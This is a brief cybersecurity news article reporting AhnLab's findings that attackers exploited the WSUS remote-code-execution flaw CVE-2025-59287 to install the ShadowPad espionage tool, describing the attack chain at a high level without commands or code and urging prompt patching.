Critical WSUS RCE (CVE-2025-59287) Actively Exploited to Deploy ShadowPad Espionage Tool
A recently patched vulnerability in Microsoft’s Windows Server Update Services has triggered a wave of attacks involving one of the most notable espionage tools of recent years. The incidents underscore how swiftly adversaries move from examining a publicly released proof-of-concept to actively exploiting a flaw for infiltration.
According to the South Korean firm AhnLab, an unidentified group gained access to Windows servers with WSUS enabled by exploiting CVE-2025-59287. Through this flaw, attackers invoked built-in system utilities to contact an external server and retrieve malicious payloads. Before deploying the primary toolset, they used PowerCat to establish a remote command shell. They then leveraged certutil and curl to deliver ShadowPad onto the compromised system.
ShadowPad, regarded as an evolution of PlugX, has long been associated with China-linked threat actors. Its architecture is modular, and its execution hinges on DLL hijacking: a legitimate executable, ETDCtrlHelper.exe, loads a malicious in-memory DLL responsible for running the core payload. The embedded module subsequently loads additional components and employs various stealth and persistence techniques.
Microsoft issued a patch for CVE-2025-59287 a month ago. Classified as critical, the flaw allows arbitrary code execution with SYSTEM-level privileges. Once a demonstration exploit became public, numerous groups began scanning accessible WSUS servers en masse, gaining initial footholds, performing reconnaissance, and deploying both malicious files and legitimate administrative utilities. According to AhnLab’s observations, this is precisely how ShadowPad found its way onto targeted servers.
The incident serves as a stark reminder that any unpatched vulnerability can rapidly escalate into a genuine threat. The sooner organizations remediate newly discovered weaknesses, the fewer opportunities attackers have to establish persistence and turn an isolated flaw into a full-scale crisis.
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
